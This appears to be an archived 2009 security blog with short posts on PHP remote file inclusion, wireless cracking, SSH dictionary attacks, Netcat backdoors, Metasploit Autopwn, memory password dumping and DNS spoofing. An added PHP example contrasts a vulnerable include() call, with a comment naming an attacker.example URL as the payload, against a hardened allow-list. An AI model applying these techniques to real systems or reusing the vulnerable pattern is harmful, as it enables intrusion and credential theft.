Wednesday, May 27, 2009

PHP Remote File Inclusion

Remote File Inclusion (RFI) is a technique used to attack websites from a remote computer. RFI allows malicious users to run their own PHP code on a vulnerable website: the server can be made to fetch and execute any remote file just by editing a URL parameter. A webshell included this way can display the files and folders on the server, add, edit or delete files and folders, send spam and even get hold of root.

More details on PHP webshells are here.
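
As an added example, not code from the original post: the include() pattern behind a typical RFI next to a hardened version that maps the URL parameter onto a fixed allow-list of local templates. The `page` parameter, the `pages/` directory and the template names are assumptions.

```php
<?php
// Added example, not part of the original post. The "page" parameter,
// the pages/ directory and the template names are assumptions.

// VULNERABLE: the query parameter flows straight into include(). If
// allow_url_include is On, a value such as http://attacker.example/x
// makes PHP fetch that remote file and execute it as code.
function render_page_vulnerable(string $page): void
{
    include $page;
}

// Fixed map of the only templates this site is allowed to include.
function allowed_pages(): array
{
    return [
        'home'    => __DIR__ . '/pages/home.php',
        'about'   => __DIR__ . '/pages/about.php',
        'contact' => __DIR__ . '/pages/contact.php',
    ];
}

// Returns the local path for a known page name, or null for anything
// else (remote URLs, traversal strings and unknown names all fall through).
function resolve_page(string $page): ?string
{
    return allowed_pages()[$page] ?? null;
}

// HARDENED: no user-supplied string ever reaches include().
function render_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Defence in depth via php.ini (these cannot be changed at request time):
//   allow_url_include = Off   ; blocks http:// and similar wrappers in include()
//   allow_url_fopen   = Off   ; if the application never needs remote files
// Keep the allow-list regardless of these settings.

render_page_hardened($_GET['page'] ?? 'home');
```

Requests such as `?page=http://...` or `?page=../etc/passwd` now hit the 404 branch instead of include(), which also gives the web server log a clean signal to alert on.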

Saturday, May 23, 2009

Top Ten Web Hacking Techniques

Top Ten Web Hacking Techniques 2008 by Jeremiah Grossman, Founder & Chief Technology Officer of WhiteHat Security.

Thursday, May 21, 2009

Aircrack-ng

This is a demonstration of hacking wireless access points with Aircrack-ng. Before running airodump we need a compatible adapter driver, which can be downloaded from here.

Please note a few points regarding wireless terminology:

Channel is the channel your access point is broadcasting on.
ESSID is the name of your wireless network.
BSSID is the MAC address of your access point.

We will have to put the wireless card into monitor mode before capturing the data. Complete step-by-step documentation can be found here.

Monday, May 18, 2009

SSH Hacking

A dictionary attack is launched against SSH using a shell script to crack passwords.

Friday, May 15, 2009

Using NetCat as a Backdoor

In this video a Windows RPC exploit is used with the help of Metasploit on BackTrack. After exploiting the RPC vulnerability in Windows, the attacker uploads the Netcat tool to regain access whenever he wants.

Thursday, May 14, 2009

Metasploit Autopwn tool

This video shows the Metasploit Autopwn tool in action. After identifying a victim's machine using port scanning techniques, run the Metasploit framework and connect it to an SQLite database. Run the port scan against the victim's machine again so that the result is saved in the database. Then run the Autopwn tool against the port scan result; Autopwn will automatically run all the exploits matching the open ports. When the attack completes successfully, we get open sessions. Job done!

This can also be achieved by running Autopwn against results saved by Nessus in NBE format.

Wednesday, May 13, 2009

Dump Cleartext Passwords From Windows Memory

This video shows how you can dump cleartext passwords from a memory dump of a Windows system using a tool called MDD.

Monday, May 11, 2009

DNS Spoof Virtual Hosts

DNS spoofing is a type of MITM attack in which the victim's computer is sent a fake DNS reply for a particular website, forcing the machine to visit a different site. But when the spoofed IP hosts multiple virtual sites, each selected by its own Host header, and the attacker wants to use this IP as the fake DNS reply, the server will not be able to determine the proper destination because the Host header it expects will be missing from the request. Hence the DNS spoofing attack will not succeed.

In this video, Ettercap is combined with a C program that changes the Host header on the fly and submits a new GET request to the web server, which allows an attacker to successfully launch a DNS spoofing attack using an IP that hosts multiple virtual websites.

More info can be found here.